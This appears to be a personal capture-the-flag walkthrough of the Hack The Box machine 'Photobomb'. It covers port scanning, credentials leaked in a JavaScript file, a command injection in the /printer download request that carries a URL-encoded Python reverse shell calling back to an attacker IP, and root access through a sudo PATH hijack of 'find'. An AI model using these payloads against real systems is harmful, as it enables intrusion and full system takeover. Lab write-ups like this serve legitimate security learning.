Board URL: https://forum.hackthebox.com/t/official-photobomb-discussion/265724
Box URL: https://app.hackthebox.com/machines/Photobomb
Created: November 11, 2022 10:00 PM
Host: photobomb.htb
IP: 10.10.11.182
Initial Scan
Running a nmap scan shows only port 22 and 80 open.
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
Starting Nmap 7.92 ( [https://nmap.org](https://nmap.org/) ) at 2022-11-11 21:57 WET
Nmap scan report for 10.10.11.182
Host is up (0.043s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to [http://photobomb.htb/](http://photobomb.htb/)
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 62.51 seconds
|
Lets also try to find subdomains and files or folders using gobuster
Using the hints from the forum, one says that i should check the JS file.
1
2
3
4
5
6
7
|
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
}
}
window.onload = init;
|
After logging in i have a set of images that i can download. I capture one of the requests for a download and modify it in burpsuite in order to get a reverse shell.
1
2
3
4
|
POST /printer HTTP/1.1
Host: photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg%3Bpython3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.14.165%22%2C9001%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27&dimensions=3000x2000
|
The user flag is in the home folder for the wizard user. After getting the user flag i run sudo -l to see what i can run as root.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~/photobomb$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
|
The last is interesting as it uses a relative path for the find command. As such, this can be easily exploited by creating a binary file in another location, exporting that location to the PATH and calling this script:
1
2
3
4
5
6
|
wizard@photobomb:~/photobomb$ echo "/bin/bash" > /tmp/find
echo "/bin/bash" > /tmp/find
wizard@photobomb:~/photobomb$ chmod +x /tmp/find
chmod +x /tmp/find
wizard@photobomb:~/photobomb$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
sudo PATH=/tmp:$PATH /opt/cleanup.sh
|
This allows me to access to the root folder and flag. A nice box, with some help for the first part.